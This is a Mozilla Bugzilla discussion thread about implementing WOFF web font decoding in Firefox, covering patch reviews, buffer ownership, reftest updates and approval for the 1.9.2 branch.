It's not clear to me that an nsAutoPtr-like model would be all that much clearer really. (See for some comments!) Once we start passing nsAutoPtr around between routines, the ownership and copying behavior has plenty of scope for errors. For example, passing a reference to nsAutoPtr into MakePlatformFont *might* result in the caller's pointer becoming null, depending whether the MakePlatformFont implementation (or something it calls) chooses to copy the pointer. That's not at all obvious at the call site. Anyhow, we can't use nsAutoPtr for an NS_Alloc'ed block. So what I have done instead is to add more comments, trying to document more explicitly where ownership of the font data passes from one object to another. I've also set aFontData to NULL in OnLoadComplete after calling MakePlatformFont, so it's clear that this pointer is no longer usable. See if you think this is a reasonable approach.

This update should also address the various comments relating to the WOFF-decoding functions. And while this is in flux, I've moved the call to ValidateSFNTHeaders into gfxUserFontSet, so it's done in one place before calling MakePlatformFont. The previous version of the patch broke one of the @font-face reftests (fallback after a bad src url was broken); this now passes all reftests locally. Pushing to tryserver for confirmation.
Created attachment 400838 [details] [diff] [review] fix silly error on Windows in the previous patch
Created attachment 400839 [details] [diff] [review] add a "woff" format hint to @font-face This adds a format hint ("woff") for the new format. Does this also need to be mentioned in the CSS fonts spec or somewhere like that?
Created attachment 400840 [details] [diff] [review] update reftests to include "woff" format hint Update the reftests to include a simple check that the "woff" hint is accepted.
Created attachment 400966 [details] the DeLarge fonts (ttf, woff, and damaged) used in several tests
Comment on attachment 400838 [details] [diff] [review] fix silly error on Windows in the previous patch Looks good. Not really happy with MakePlatformFont having to delete the font data, it still feels odd but I guess I can live with this. One small nit: > +#ifdef WOFF_MOZILLA_CLIENT > +# include <prnetdb.h> > +# define READ32BE(x) PR_ntohl(x) > +# define READ16BE(x) PR_ntohs(x) > +#else Make these NS_SWAP32 and NS_SWAP16 macros rather than function call versions.
Comment on attachment 400839 [details] [diff] [review] add a "woff" format hint to @font-face I'll add the "woff" hint when I do another round of CSS3 Fonts spec edits.
Comment on attachment 400840 [details] [diff] [review] update reftests to include "woff" format hint Looks good. No need for the nofont version, just make the bad font cases != ref version. (nsIStreamLoader) (implement WOFF) (format hint) (reftests)
Created attachment 401197 [details] [diff] [review] updated woff patch following final review comments Uses a local copy of the byte-swap macros in woff-private.h because NS_SWAP16/32 are defined in a C++ header that we cannot include here.
Requesting 1.9.2 approval for the WOFF patches (three code patches, plus tests) as we would like to be able to announce that the new font format will be supported in FF3.6.
Additional comments re the request for 1.9.2 approval: This is the new web font format that has been thrashed out between ourselves and others; it has the endorsement of dozens of font designers and vendors, and offers the potential to become a truly interoperable web font solution. Other browser vendors have generally expressed a willingness to implement this if they see it being adopted; we are in a position to kick-start this process if we can announce that it will be supported in our upcoming FF 3.6 release. If we miss FF 3.6, so that WOFF support will not be in our shipping product until 3.7, we may lose the current momentum and font-vendor support, and end up with a much more fragmented web-font world as alternative EOT-based solutions (that we consider inferior) are pushed elsewhere. The code has landed on trunk without problems, and should be safe to land on 1.9.2; I have checked locally that it applies, builds, and tests successfully on the branch. I believe it to be a low-risk feature: although it is a new file format to support, the main decoding is done by zlib (stable, well-tested code), and the result is standard OpenType data that is then handled by our existing font and text code. There is no impact on font and text usage for existing pages that do not use the new format. The actual interpretation of the WOFF file structure is of course new code, so John and I have tried to ensure that this is safe from overflows, etc. On the other hand, once a WOFF file has been decoded to OpenType form, we can actually be more confident that the data we're handing to the (sometimes fragile) platform font APIs is structurally valid than with fonts that are downloaded directly in OpenType format.
(In reply to comment #44) > The code has landed on trunk without problems, and should be safe to land on > 1.9.2; I have checked locally that it applies, builds, and tests successfully > on the branch. I posted a 1.9.2 try server build with attachment 401197 [details] [diff] [review] in order to make sure that this doesn't break tests/talos on this branch. I have tagged the build with "woff"; please watch the try tree for results in the next few hours.
The patch doesn't compile, see: <>.
As noted in comment #43, there are three code patches, plus the tests. Your tryserver build only included patch #2 of 3, so this failure is entirely expected. I am currently re-testing a complete rollup patch on an updated 1.9.2 tree, and will post it here after a successful local build and test.
Created attachment 402191 [details] [diff] [review] rolled-up patch with all code changes + tests, for 1.9.2
1.9.2-based tryserver builds at
Current WOFF spec:
Mention added to the docs on @font-face here:
(In reply to comment #51) > Mention added to the docs on @font-face here: > > I see that document now says Gecko 1.9.2 (Firefox 3.6) added support for WOFF but this may be premature, as we don't yet know if it will be approved for 1.9.2. The code is on trunk, which means it should go into 1.9.3 (presumably for FF 3.7), but still waiting for a response to the a192 request.
Whoops, I misread a comment earlier, thought it said this was checked in on 1.9.2, but it's just that there's a patch ready. I'll revise the text.
Comment on attachment 402191 [details] [diff] [review] rolled-up patch with all code changes + tests, for 1.9.2 a192=shaver
Refreshed patch and pushed to branch:
Fine. Now should there be another bug about EOT Lite support?
(In reply to comment #56) > Fine. Now should there be another bug about EOT Lite support? I agree. Please file it.
Filed: bug 520357 | https://bugzilla.mozilla.org/show_bug.cgi?id=507970 | CC-MAIN-2017-26 | refinedweb | 3,877 | 61.06 |
Generate shuffling in the specified list

import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
import java.util.Random;

public class ShuffleList {
    public static void main(String[] args) {
        String[] employees = {"Ravi", "Suman", "Komal"};
        // create a list for the specified array of employees
        List<String> list = new ArrayList<String>(Arrays.asList(employees));
        // create a Random object to generate numbers randomly
        Random num = new Random();
        // shuffle and print the list according to the generated random numbers
        Collections.shuffle(list, num);
        System.out.println(list);
    }
}
1. What is Data Science? How would you say it is similar or different to business analytics and business intelligence?
Data science is a field that deals with analysis of data. It studies the source of information, what the information represents and turning it into a valuable resource by giving insights of the data that are later used for creating strategies. It is a combination of business perspectives, computer programming and statistical techniques.
Business analytics or simply analytics is the core of business intelligence and data science. Data science is a relatively new term used for analysis of big data and giving insights.
Analytics generally has a higher degree of business perspective than data science, which is more programming-heavy. The terms are, however, often used interchangeably.
3. Python or R – Which one would you prefer for text analytics?
The best possible answer for this would be Python because it has Pandas library that provides easy to use data structures and high performance data analysis tools.
4. How do you build a custom function in Python or R?
In R, a custom function is created with the function keyword. The structure of a function is given below:

myfunction <- function(arg1, arg2, ...) {
statements
return(object)
}

In Python, a custom function is created with the def keyword.
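In Python, the equivalent structure uses the def keyword (function and argument names here are illustrative):

```python
def myfunction(arg1, arg2=10):
    """Add two numbers; arg2 defaults to 10."""
    result = arg1 + arg2
    return result

print(myfunction(5))      # 15
print(myfunction(5, 20))  # 25
```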
5. Which package is used to do data import in R and Python? How do you do data import in SAS?
We can do data import using multiple methods:
– In R we use RODBC for RDBMS data, and data.table for fast import.
– We use jsonlite for JSON data, foreign package for other languages like SPSS
– We use the sas7bdat package for SAS data.
– In Python we use Pandas package and the commands read_csv , read_sql for reading data. Also, we can use SQLAlchemy in Python for connecting to databases.
6. What is an RDBMS? Name some examples for RDBMS? What is CRUD?
A relational database management system (RDBMS) is a database management system that is based on a relational model. The relational model uses the basic concept of a relation or table. RDBMS is the basis for SQL, and for database systems like MS SQL Server, IBM DB2, Oracle, MySQL, and Microsoft Access.
In computer programming, create, read, update and delete (as an acronym, CRUD; sometimes SCRUD, with an "S" for search) are the four basic functions of persistent storage.
7. How do you check for data quality?
Data quality is an assessment of data’s fitness to serve its purpose in a given context. Different aspects of data quality include:
– Accuracy
– Completeness
– Update status
– Relevance
– Consistency across data sources
– Reliability
– Appropriate presentation
– Accessibility
Maintaining data quality requires going through the data in different intervals and scrubbing it. This involves updating it, standardizing it, and removing duplicates to create a single view of the data, even if it is stored in multiple systems.
8. What is missing value imputation? How do you handle missing values in Python or R?
Imputation is the process of replacing missing data with substitute values.
IN R
Missing values are represented in R by the NA symbol. NA is a special value whose properties are different from other values. NA is one of the very few reserved words in R: you cannot give anything this name. Here are some examples of operations that produce NA’s.
> var(8) # Variance of one number
[1] NA
> as.numeric(c("1", "2", "three", "4")) # Illegal conversion
[1] 1 2 NA 4
Operations on missing values:
Almost every operation performed on an NA produces an NA. For example:
> x <- c(1, 2, NA, 4) # Set up a numeric vector
> x # There’s an NA in there
[1] 1 2 NA 4
> x + 1 # NA + 1 = NA
Excluding missing values:
Math functions generally have a way to exclude missing values in their calculations. mean(), median(), colSums(), var(), sd(), min() and max() all take the na.rm argument. When this is TRUE, missing values are omitted. The default is FALSE, meaning that each of these functions returns NA if any input number is NA. Note that cor() and its relatives don’t work that way: with those you need to supply the use= argument. This is to permit more complicated handling of missing values than simply omitting them.
R’s modeling functions accept an na.action argument that tells the function what to do when it encounters an NA. The filter functions are:
– na.fail: Stop if any missing values are encountered
– na.omit: Drop out any rows with missing values anywhere in them and forget them forever
– na.exclude: Drop out rows with missing values, but keep track of where they were (so that when you make predictions, for example, you end up with a vector whose length is that of the original response)
– na.pass: Take no action.
A couple of other packages supply more alternatives:
– na.tree.replace (library tree): For discrete variables, adds a new category called "NA" to replace the missing values
– na.gam.replace (library gam): Operates on discrete variables like na.tree.replace(); for numerics, NAs are replaced by the mean of the non-missing entries.
Python:
Missing values in pandas are represented by NaN or None. They can be detected using isnull() and notnull() functions.
Operations on missing values
When summing data with sum(), NA (missing) values are treated as zero; functions like mean(), max() and min() simply exclude them. If the data are all NA, the result will be NA.
df[“one”]
one
a NaN
c NaN
e 0.294633
f -0.685597
h NaN
df[“one”].sum()
-0.39096437337883205
Cleaning/filling missing values
– fillna- can fill in NA values with non-null data
– dropna – to remove axis containing missing values.
Imputing missing data:
Imputer is a transformer in Python's scikit-learn library used to fill in missing values with a suitable substitute. Example:

import pandas as pd
import numpy as np
from sklearn.preprocessing import Imputer

s = pd.Series([1, 2, 3, np.NaN, 5, 6, None])
imp = Imputer(missing_values='NaN', strategy='mean', axis=0)
imp.fit([1, 2, 3, 4, 5, 6, 7])
x = pd.Series(imp.transform(s).tolist()[0])
print(x)

output:

0    1
1    2
2    3
3    4
4    5
5    6
6    7
dtype: float64
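For completeness, the same mean-imputation idea can be written without any external library (a minimal sketch, using None as the missing-value marker):

```python
def impute_mean(values):
    """Replace None entries with the mean of the non-missing entries."""
    present = [v for v in values if v is not None]
    mean = sum(present) / len(present)
    return [mean if v is None else v for v in values]

print(impute_mean([1, 2, None, 4]))  # the None becomes 7/3
```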
9. Why do you need a for loop? How do you do for loops in Python and R?
We use the ‘for’ loop if we need to do the same task a specific number of times.
In R, it looks like this:
for (counter in vector) {commands}
We will set up a loop to square every element of the dataset, foo, which contains the odd integers from 1 to 100 (keep in mind that vectorizing would be faster for a trivial example like this):
foo = seq(1, 100, by=2)
foo.squared = NULL
for (i in 1:50 ) {
foo.squared[i] = foo[i]^2
}
If the creation of a new vector is the goal, first we have to set up a vector to store things in prior to running the loop. This is the foo.squared = NULL part.
Next, the real for loop begins. This code says we'll loop 50 times (1:50). The counter we set up is 'i' (but we can use whatever variable name we want there). For our new vector foo.squared, the ith element will equal the square of the ith element of foo (on the first loop, i=1; on the second loop, i=2; and so on).
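The question also asks about Python; the equivalent loop there (squaring the odd integers from 1 to 100) looks like this:

```python
# Square every odd integer from 1 to 100, as in the R example.
foo = range(1, 100, 2)
foo_squared = []
for value in foo:
    foo_squared.append(value ** 2)

print(foo_squared[:5])   # [1, 9, 25, 49, 81]
print(len(foo_squared))  # 50
```

No pre-sizing of the result list is needed; append() grows it on each iteration.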
10. What is advantage of using apply family of functions in R? How do you use lambda in Python?
The apply function allows us to make entry-by-entry changes to data frames and matrices.
The usage in R is as follows:
apply(X, MARGIN, FUN, …)
where:
X is an array or matrix;
MARGIN is a variable that determines whether the function is applied over rows (MARGIN=1), columns (MARGIN=2), or both (MARGIN=c(1,2));
FUN is the function to be applied.
If MARGIN=1, the function accepts each row of X as a vector argument, and returns a vector of the results. Similarly, if MARGIN=2 the function acts on the columns of X. Most impressively, when MARGIN=c(1,2) the function is applied to every entry of X.
Advantage:
With the apply function we can edit every entry of a data frame with a single line command. No auto-filling, no wasted CPU cycles.
Lambda:

afunc = lambda a: expression_on_a

You can then use lambda with the map, reduce and filter functions as required. Lambda applies the function to elements one at a time.
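A short example of lambda combined with map, filter and reduce (note that reduce lives in functools in Python 3):

```python
from functools import reduce  # reduce moved to functools in Python 3

nums = [1, 2, 3, 4, 5]
squares = list(map(lambda a: a ** 2, nums))        # square each element
evens = list(filter(lambda a: a % 2 == 0, nums))   # keep only even elements
total = reduce(lambda a, b: a + b, nums)           # fold the list into a sum
print(squares, evens, total)
```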
11. What packages are used for data mining in Python and R?
– Scikit-learn – machine learning library, built on top of NumPy, SciPy and matplotlib.
– NumPy and SciPy – provide mathematical functionality similar to Matlab.
– Matplotlib – visualization library, provides plots similar to Matlab's.
– NLTK – Natural Language Processing library, extensively used for text mining.
– Orange – provides visualization and machine learning features; also provides association rule learning.
– Pandas – inspired by R; provides functionality for working with data frames.
R:
– data.table – provides fast reading of large files
– rpart and caret – for machine learning models
– arules – for association rule learning
– ggplot2 – provides various data visualization plots
– tm – to perform text mining
– forecast – provides functions for time series analysis
12. What is machine learning? What is the difference between supervised and unsupervised methods?
Machine learning studies computer algorithms for learning to do stuff. There are many examples of machine learning problems. For e.g.:
– optical character recognition: categorize images of handwritten characters by the letters represented
– face detection: find faces in images (or indicate if a face is present)
– spam filtering: identify email messages as spam or non-spam
– topic spotting: categorize news articles (say) as to whether they are about politics, sports, entertainment, etc.
– spoken language understanding: within the context of a limited domain, determine the meaning of something uttered by a speaker to the extent that it can be classified into one of a fixed set of categories
– medical diagnosis: diagnose a patient as a sufferer or non-sufferer of some disease
– customer segmentation: predict, for instance, which customers will respond to a particular promotion
– fraud detection: identify credit card transactions (for instance) which may be fraudulent in nature
– weather prediction: predict, for instance, whether or not it will rain tomorrow
Supervised learning is the type of learning that takes place when the training instances are labelled with the correct result, which gives feedback about how learning is progressing. Supervised learning is fairly common in classification problems because the goal is often to get the computer to learn a classification system that we have created. Digit recognition is a common example of classification learning.
In unsupervised learning, there are no pre-determined categorizations. There are two approaches to unsupervised learning:
- The first approach is to teach the agent not by giving explicit categorizations, but by using some sort of reward system to indicate success. This approach nicely generalizes to the real world, where agents might be rewarded for doing certain actions and punished for doing others.
- The second approach is clustering, where the goal is not to maximize a utility function but simply to find similarities in the training data. The assumption is often that the clusters discovered will match reasonably well with an intuitive classification; for instance, clustering individuals based on demographics might divide a population into distinct groups.
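As a toy illustration of the clustering style of unsupervised learning, here is a minimal 1-D k-means sketch (illustrative only; real work would use a library such as scikit-learn):

```python
def kmeans_1d(points, centers, iters=10):
    """Toy 1-D k-means: no labels are used, only similarity of the points."""
    for _ in range(iters):
        # assignment step: each point joins its nearest center's cluster
        clusters = [[] for _ in centers]
        for p in points:
            nearest = min(range(len(centers)), key=lambda j: abs(p - centers[j]))
            clusters[nearest].append(p)
        # update step: move each center to the mean of its cluster
        centers = [sum(c) / len(c) if c else centers[j]
                   for j, c in enumerate(clusters)]
    return centers

print(kmeans_1d([1, 2, 10, 11], [0.0, 5.0]))  # [1.5, 10.5]
```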
13. What is random forests and how is it different from decision trees?
Random forests involves building several decision trees based on sampling features and then making predictions based on majority voting among trees for classification problems or average for regression problems. This solves the problem of overfitting in Decision Trees.
Algorithm:-
Repeat K times:
– Draw a bootstrap sample from the dataset.
– Train a Decision Tree by selecting m features from available p features.
– Measure out of bag error. Evaluate against the samples which were not selected in bootstrap.
Make a prediction by majority voting among K trees
Random Forests are more difficult to interpret than single decision trees, so understanding variable importance helps.
Random forests are easy to parallelize, since the trees can be built independently. They handle high-dimensional (large-p) problems naturally, since each tree considers only a subset of the attributes.
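The final majority-voting step can be sketched in a few lines (names are illustrative; tree_predictions is the list of per-tree class labels for one sample):

```python
from collections import Counter

def forest_predict(tree_predictions):
    """Majority vote among the per-tree predictions for a single sample."""
    return Counter(tree_predictions).most_common(1)[0][0]

# Three hypothetical trees vote on one email:
print(forest_predict(["spam", "ham", "spam"]))  # spam
```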
14. What is linear optimization? Where is it used? What is the travelling salesman problem? How do you use Goal Seek in Excel?
Linear optimization or Linear Programming (LP) involves minimizing or maximizing an objective function subject to bounds, linear equality, and inequality constraints. Example problems include design optimization in engineering, profit maximization in manufacturing, portfolio optimization in finance, and scheduling in energy and transportation.
The following algorithms are commonly used to solve linear programming problems:
– Interior point: Uses a primal-dual predictor-corrector algorithm and is especially useful for large-scale problems that have structure or can be defined using sparse matrices.
– Active-set: Minimizes the objective at each iteration over the active set (a subset of the constraints that are locally active) until it reaches a solution.
– Simplex: Uses a systematic procedure for generating and testing candidate vertex solutions to a linear program. The simplex algorithm is the most widely used algorithm for linear programming.
Travelling Salesman Problem belongs to the class of np-complete problems. TSP is a special case of the travelling purchaser problem and the Vehicle routing problem. It is used as a benchmark for many optimization methods. It is a problem in graph theory requiring the most efficient i.e. least squared distance a salesman can take through n cities.
15. What is CART and CHAID? How is bagging different from boosting?
CART:
– Classification And Regression Tree (CART) analysis is an umbrella term used to refer to Classification Tree analysis in which the predicted outcome is the class to which the data belongs. and Regression Tree analysis in which the predicted outcome can be considered a real number.
– Splits in Tree are made by variables that best differentiate the target variable.
– Each node can be split into two child nodes.
– Stopping rule governs the size of the tree.
CHAID:
– Chi Square Automatic Interaction Detection.
– Performs multi-level splits whereas CART uses binary splits.
– Well suited for large data sets.
– Commonly used for market segmentation studies.
Bagging:
- Draw N bootstrap samples.
- Retrain the model on each Sample.
- Average the results : – Regression – Averaging : Classification – Majority Voting
- Works great for overfit models – Decreases variance without changing bias, Doesn’t help much with underfit/high bias models.
- Insensitive to training data.
Boosting:
– Instead of selecting data points randomly with bootstrap favor the mis-classified points by adjusting the weights down for correctly classified examples.
– Here sequentiality is present so difficult to apply in case of large data.
16. What is clustering? What is the difference between kmeans clustering and hierarchical clustering?
Cluster is a group of objects that belongs to the same class. Clustering is the process of making a group of abstract objects into classes of similar objects.
Let us see why clustering is required in data analysis:
– Scalability − We need highly scalable clustering algorithms to deal with large databases.
– Ability to deal with different kinds of attributes − Algorithms should be capable of being applied-able, comprehensible, and usable.
K-MEANS clustering:
K-means clustering is a well known partitioning method. In this method objects are classified as belonging to one of K-groups. The results of partitioning method are a set of K clusters, each object of data set belonging to one cluster. In each cluster there may be a centroid or a cluster representative. In the case where we consider real-valued data, the arithmetic mean of the attribute vectors for all objects within a cluster provides an appropriate representative; alternative types of centroid may be required in other cases.
17. What is churn? How would it help predict and control churn for a customer?
Customer churn, also known as customer attrition, customer turnover, or customer defection, is the loss of clients or customers.
Banks, telephone service companies, internet service providers, pay TV companies, insurance firms, and alarm monitoring services, often use customer churn analysis and customer churn.
The statistical methods, which have been applied for decades in medicine and engineering, come in handy any time we are interested in understanding how long something (customers, patients, car parts) survives and what actions can help it survive longer.
18. What is market basket analysis? How would you do it in R and Python?
Market basket analysis is the study of items that are purchased or grouped together in a single transaction or multiple, sequential transactions. Understanding the relationships and the strength of those relationships is valuable information that can be used to make recommendations, cross-sell, up-sell, offer coupons, etc.
The analysis reveals patterns such as that of the well-known study which found an association between purchases of diapers and beer.
In a market basket analysis set (e.g., pencil, paper and rubber). The higher the support the more frequently the item set summarizes the strength of association between the products on the left and right hand side of the rule; the larger the lift the greater the link between the two products.
19. What is association analysis? Where is it used?
Association analysis uses a set of transactions to discover rules that indicate the likely occurrence of an item based on the occurrences of other items in the transaction. The technique of association rules is widely used for retail basket analysis. It can also be used for classification by using rules with class labels on the right-hand side. It is even used for outlier detection with rules indicating infrequent/abnormal association.
Association analysis also helps us to identify cross-selling opportunities, for example: we can use the rules resulting from the analysis to place associated products together in a catalog, in the supermarket, or in the Web shop, or apply them when targeting a marketing campaign for product B at customers who have already purchased product A
Association analysis determines these rules by using historic data to train the model. We can display and export the determined association rules.
20. What is the central limit theorem? How is a normal distribution different from chi square distribution?
Central limit theorem states that the distribution of an average will tend to be Normal as the sample size increases, regardless of the distribution from which the average is taken except when the moments of the parent distribution do not exist. All practical distributions in statistical engineering have defined moments, and thus the CLT applies.
Chi square distribution uses standard normal variates which are a part of normal distribution. In statistical terms:
If X is normally distributed with mean μ and variance σ2 > 0, then:
is distributed as a chi-square random variable with 1 degree of freedom.
21. What is a Z test, Chi Square test, F test and T test?
Z-test is a statistical test where normal distribution is applied and is basically used for dealing with problems related to large samples when n (sample size) ≥ 30 .
It is used to determine whether two population means are different when the variances are known and the sample size is large. The test statistic is assumed to have a normal distribution and parameters such as standard deviation should be known in order for z-test to be performed. that the standard deviation is unknown, while z-tests assume that it is known. If the standard deviation of the population is unknown, the assumption that the sample variance equals the population variance is made.
It implements a z-test similar to the t.test function.
Usage:
simple.z.test(x, sigma, conf.level=0.95)
T-test assesses whether the means of two groups are statistically different from each other
It performs one and two sample t-tests on vectors of data.
Usage:
t.test(x, …)
## Default S3 method:
t.test(x, y = NULL,
alternative = c(“two.sided”, “less”, “greater”),
mu = 0, paired = FALSE, var.equal = FALSE,
conf.level = 0.95, …)
## S3 method for class ‘formula’
t.test(formula, data, subset, na.action, …)
Chi square is a statistical test used to compare the observed data with the data that we would expect to obtain according to a specific hypothesis.
Formula for the chi square test is:
chisq.test performs chi-squared contingency table tests and goodness-of-fit tests.
Usage:
chisq.test(x, y = NULL, correct = TRUE,
p = rep(1/length(x), length(x)), rescale.p = FALSE,
simulate.p.value = FALSE, B = 2000)
The F-test is designed to test if two population variances are equal. It does this by comparing the ratio of two variances. So, if the variances are equal, the ratio of the variances will be 1.
Usage:
var.test(x, …)
## Default S3 method:
var.test(x, y, ratio = 1,
alternative = c(“two.sided”, “less”, “greater”),
conf.level = 0.95, …)
## S3 method for class ‘formula’
var.test(formula, data, subset, na.action, …)
22. What is Collaborative filtering?
The process of filtering used by most of the recommender systems to find patterns or information by collaborating viewpoints, various data sources and multiple agents.
23..
24..
25..
26. Do gradient descent methods always converge to same point?
No, they do not because in some cases it reaches a local minima or a local optima point. You don’t reach the global optima point. It depends on the data and starting conditions
27..
28..
29...
31..
32..
33..
34. How can you iterate over a list and also retrieve element indices at the same time?
This can be done using the enumerate function which takes every element in a sequence just like in a list and adds its location just before it.
35..
0 Responses on Data Science Interview Questions and Answers" | https://tekslate.com/data-science-interview-questions-and-answers | CC-MAIN-2017-17 | refinedweb | 3,571 | 56.86 |
Default values and ?? in C# 2.0
No, I’m not confused. Read on and all shall become clear…
Since the dawn of time*, the conditional-expression operator, ?:, has confused C-language newbies for generations. Not to be outdone, C# 2.0 has introduced the ?? operator. This is a little known addition to the C# language that has an interesting use – besides confusing VB developers, that is. Consider the following code:
if(title != null) {
return title;
} else {
return string.Empty;
}
Basically you want to return a default value if your reference is null. If your type happens to be a string, this could be a shared instance (such as string.Empty) or “Default Value” or something else. Other reference types (or Nullables) could do something else.
This isn’t hard code, but it is a fair amount of typing. So many would shorten it to:
return (title != null) ? title : string.Empty;
Checking for null returns is fairly common, especially in database work or when reading from config files. So C# 2.0 introduced the ?? operator:
return title ?? string.Empty;
This does exactly the same thing as the previous two examples, just with less typing. Another interesting use is when working with Nullables:
int? x = ReadFromConfig();
// Do some work
int y = x ?? 42;
It will take awhile to get used to, but is an interesting addition to the C# toolbox.
* The dawn of time is roughly sometime in the early 1970s. | http://jameskovacs.com/2005/12/08/default-values-and-in-c-20/ | CC-MAIN-2017-13 | refinedweb | 240 | 70.7 |
Using IPython/Jupyter Notebook with PyCharm
Before you start
Prior to executing the tasks of this tutorial, make sure that the following prerequisites are met:
- You have a Python project already created. In this tutorial the project
C:/SampleProjects/py/JupyterNotebookExampleis used.
- In the Project Interpreter page of the Settings/Preferences dialog, you have:
- Created a virtual environment. For this tutorial a virtual environment based on Python 3.6 has been created.
- Installed the following package:
jupyter
matplotlib
sympy
Note that PyCharm automatically installs the dependencies of these packages.
Creating a Jupyter Jupyter Jupyter Notebook server will run:
In this dialog box, click Cancel, and then click the Run Jupyter Notebook link:
Next, if you didn't install the "Jupyter Notebook" package yet, the run/debug configuration dialog appears showing the error message:
Install the package to fix the problem.
Jupyter server runs in the console:
Follow this address:
Actually, that's it... From now on you are ready to work with the notebook integration.
Working with cells
First of all, add the following import statement:
from pylab import *
This how it's done. To create the next empty cell, click
on the toolbar:
Start typing in this cell, and notice code completion:
import statements and run them:
The new cell is created automalically. In this cell, type the following code that will define
x and
y variables:
x = linspace(0, 5, 10) y = x ** 2
Run this cell, and then run the next one. This time it shows the expected output:
Clipboard operations with the cells
You can perform the standard clipboard operations: Ctrl+C, Ctrl+X and Ctrl+V.
Try these shortcuts_11<<
Run this cell and see the error message. Next, click the down arrow, and choose Markdown from the list. The cell changes its view:
Now click
on the toolbar, and see Jupyter_16<< | https://www.jetbrains.com/help/pycharm/2017.3/using-ipython-jupyter-notebook-with-pycharm.html | CC-MAIN-2018-13 | refinedweb | 306 | 61.36 |
Announcing Pegasus Frontend
@tronkyfran you can rotate every UI element by all three axes ("3D-like"), around a custom point, and you can scale horizontally and vertically. You can also write custom OpenGL shaders, which would allow you to do pretty much anything with a picture.
Every UI element means vídeo preview box is included? If thats right them I just would need to test if the raspberry gives enough performance to run my theme, awesome!!!
@tronkyfran yup, including the video. You can also animate these properties, making things spinning or moving things around the screen. Or make people feel dizzy :)
@tronkyfran said in Announcing Pegasus Frontend:
enough performance to run my theme
Wait, are you making a theme for Pegasus? how?
Got the analog navigation working, I'll clean up the code a bit tomorrow then merge it.
@lilbud Well, not exactly "making", I have a lot of assets for an emulationstation theme, but it implied to make a lot of custom game art for it and I simply dont have the time right now. But if I can reuse the scraped art somehow....thats a different thing. The fact is that I have now to take a look to the theming process here in pegasus and how to adapt the assets, so I have a long way to go yet, but at least there is a possibility for my idea to come true :D
This were some sketches of it: I would need to reproject cart art and video preview, and suppose I will have to let go the depth of field blur and some other things. Took a look to opengl shading and it should help a lot... :D
@tronkyfran Nice! Yes, it'd be possible to create such a theme, but yeah getting the cart art right might be slightly difficult (but not impossible). There's a bunch of built-in shaders as well, so for just blurring you won't need to write them manually. Here's a list of available graphical effects.
Weekly changelog:
- Pegasus can now be controlled with more than one gamepad (in case you had problems before; also this item would need some testing)
- added gamepad analog stick navigation support
- the list of languages is no longer hardcoded
- minor changes due to cleaning up the code
- Darksavior last edited by Darksavior
@fluffypillow Thanks for the analog controls. Seems to work fine.
I just tried it now. Sad to see there's now spacing in between games. I really liked the way they were before. Hopefully you'll add choices in how it looks in the future. Have you thought on how to adjust the layout? I'd figure rows of 5, 4, 3, or 2 horizontal. 4 seemed really well for sfc and cd games. I'd like to see how well 3 looks for arcade games.
@darksavior Pegasus should show 4 columns for platforms with wide box art (eg. SNES) and 5 for tall ones (eg. NES). Previously it was manually set to 5 for the NES, but a few weeks ago I've changed it to guess the columns from the actual images. It should look like this:
If there are random spacings around, that's likely a bug (can't test with all possible box arts after all).
@fluffypillow It looks so awesome!
What's the status in regards to us non-coders, plain gamers?
Does it make sense to install it now, or should we wait a couple of months?
@andershp it should be fairly stable and work fine for general use. Its just that it's not too user friendly yet, lacks documentation and some features are not yet done (game entry editing, system informations, custom config files, a clock in the corner). You can give it a try, see how it works for you.
Steam support and RetroArchivements integration is also planned, a theme repository and an update checker might be useful too, and we'd need a nice logo/icon in the future as well.
@fluffypillow said in Announcing Pegasus Frontend:
we'd need a nice logo/icon in the future as well.
I'll be here if you need help
@fluffypillow Custom config files - as in retroarch.cfg files?
@AndersHP as in game list and system definition files. Currently Pegasus uses ES2's XML files, but it shouldn't depend on them.
@lilbud I've made a GitHub issue for it previously, but didn't really made progress on it; I'll add some "inspirational materials" and details the weekend in case you want draw something nice.
@dudleydes could you create a new issue for the controller problem? I'd be easier for me to see the related discussion in one place.
@fluffypillow I have created an issue at the Github page.
I have installed Qt Creator on my desktop but I really can't figure out how to create a theme for Pegasus. I would be grateful if you could give a guide on how to get started.
@dudleydes yeah the theming is still not properly documented, but you can use the Flixnet theme as an example in the meanwhile (or the default theme, which has some more complex parts).
In short, every theme needs a
theme.inimetadata file and a
theme.qml, the main QML file. These files should be under
~/.config/pegasus-frontend/themes/<theme name>/.
The
theme.iniis a list of
key = valuepairs, you'll need at least a
name(other values aren't used at the moment). The format may also change in the future, eg. I'll likely start using
:instead of
=.
The
theme.qmlis the QML component that'll fill the screen, which at the moment must be a
FocusScopewith active focus:
import QtQuick 2.7 FocusScope { focus: true // your code here }
Other than that, you're free to use whatever QML elements you want (EXCEPT the Qt Quick Controls 1/2 items, as they aren't really for this kind of application and are not available in the automatic builds).
To access the game data, you can use the similarly undocumented
pegasusobject:
pegasus.platformsis a list (= you can use as a
model) of platforms
pegasus.currentPlatformis the currently selected platform
pegasus.currentPlatformIndexis the index of the currently selected platform (most parts are read-only, but this is a field is writable)
Every
platformhas a
shortName(eg.
nes) and
longName(which is currently empty as ES2 files only have one
<name>) field, and
games,
currentGameand
currentGameIndexfields, which work similarly as listed above.
Finally, every
gamehas the following single-value fields:
boxFront,
boxBack,
boxSpine,
boxFull,
box(same as
boxFull),
cartridge,
logo,
marquee,
bezel,
gridicon,
flyer,
music, and the following lists:
fanarts,
screenshots,
videos.
Note that values may be empty (eg. no games for a platform, or no particular asset for a game). The field names may also change (we're still in alpha). Also in case you see
.qmlcfiles, those are caches, no need eg. commit them to Git or such.
Weekly changelog: Nothing interesting this week, as I was working on another side project.
In case you'd like to try drawing a logo and want to read my nasty comments about your entries, I've updated the relevant issue.
- Darksavior last edited by Darksavior
@fluffypillow My mistake for saying there was a change in the spacing. I just got used to some sections being 4 columns not 5. Changing column numbers should be about the last feature I'm waiting for along with exiting game going back to the game itself and not the beginning of the list.
Well, I got working the blend image modes for my theme!!!was pretty easy, now to get a look to qt3d and rasp compatibility, that will be harder for sure. When I get everything working I can make a tutorial if anyone is interested! I see HUGE possibilities for this frontend,just dont know if the pi will hace enough juice for it ;)
Contributions to the project are always appreciated, so if you would like to support us with a donation you can do so here.
Hosting provided by Mythic-Beasts. See the Hosting Information page for more information. | https://retropie.org.uk/forum/topic/9598/announcing-pegasus-frontend/317 | CC-MAIN-2019-47 | refinedweb | 1,362 | 72.16 |
Can (and perhaps, if you’re a moderator – I’m not sure), you’ll see a field that says:
Last activity: 4 hours ago from XXX.XXX.XXX.XXX
